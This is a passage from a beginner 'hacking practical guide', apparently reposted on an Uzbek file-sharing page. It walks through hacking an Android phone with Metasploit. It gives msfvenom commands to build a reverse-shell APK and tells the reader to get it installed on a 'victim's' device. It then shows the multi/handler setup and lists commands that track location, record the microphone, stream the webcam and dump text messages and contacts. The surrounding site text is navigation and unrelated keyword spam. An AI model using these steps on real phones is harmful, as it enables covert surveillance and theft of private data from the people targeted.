Hacking: Hacking Practical Guide for Beginners


How to Hack an Android Phone



Download 10,87 Mb.
Pdf ko'rish
bet24/26
Sana19.05.2023
Hajmi10,87 Mb.
#941182
1   ...   18   19   20   21   22   23   24   25   26
Bog'liq
Hacking Hacking Practical Guide for Beginners (Hacking With Python) ( PDFDrive )

How to Hack an Android Phone
Metasploit has a powerful payload generator called “msfvenom”. With msfvenom, you
can create payloads for any device that you want to hack. In this lesson, you’ll use
msfvenom to hack an Android phone.
Here are the steps:
1. Access your Kali Linux computer and launch a terminal.
2. Specify the payload and generate an executable file. The command that you should
type is:
root@kali:-# msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.110
LPORT=4444 R>andro.apk
Important Note: Set your own IP address in the LHOST section of the code. Also, do not
add extra space characters to this code.
3. This process will generate an apk file, which is an executable file for android
devices. Send and install this apk file to the phone you want to hack.
4. Launch Metasploit by typing “msfconsole”.
5. Activate the multi-handler tool of Metasploit and set it up. You will use the multi-
handler to control the apk file you sent. The commands that you must type are:
use/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (insert your IP address here)
set LPORT 4444
exploit
6. Metasploit will launch the payload handler. Now, you just have to wait until your
victim launches the installed app in his device. The name of this app is “MAIN
ACTIVITY”. You will get a meterpreter terminal on the target device as soon as the
app runs.
7. Take advantage of the hacked device by issuing commands. Here are some
commands that you can use:


1. geolocate – This command allows you to locate the target device.
2. record_mic – This command activates the microphone of the hacked device.
The mic will record every sound that your victim makes. This information
will be sent to your computer.
3. dump_sms – With this command, you can obtain the text messages present
on the target device.
4. webcam_stream – This command launches a streaming session using the
webcam of the target device.
5. webcam_snap – Use this command to take a shot using the camera of the
hacked phone.
6. dump_contacts – This command grabs all of the contacts present in the
target device.



Download 10,87 Mb.

Do'stlaringiz bilan baham:
1   ...   18   19   20   21   22   23   24   25   26




Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©www.hozir.org 2024
ma'muriyatiga murojaat qiling

kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha


yuklab olish